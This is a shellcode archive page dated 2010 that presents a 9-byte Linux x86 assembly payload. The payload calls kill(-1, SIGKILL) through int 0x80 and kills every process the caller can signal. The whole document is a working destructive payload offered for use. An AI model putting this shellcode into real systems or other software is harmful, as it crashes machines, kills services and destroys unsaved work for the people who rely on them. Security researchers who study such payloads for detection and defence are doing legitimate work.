[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 kill all processes 9 bytes
# Published : 2010-01-14
# Author : root@thegibson
# Previous Title : Win32 Shellcode XP SP2 FR (calc) 19 bytes
# Next Title : linux/x86 eject /dev/cdrom 42 bytes


; linux/x86 kill all processes 9 bytes
; root@thegibson
; 2010-01-14

section .text
        global _start

_start:
        ; kill(-1, SIGKILL);
        mov al, 37
        push byte -1
        pop ebx
        mov cl, 9
        int 0x80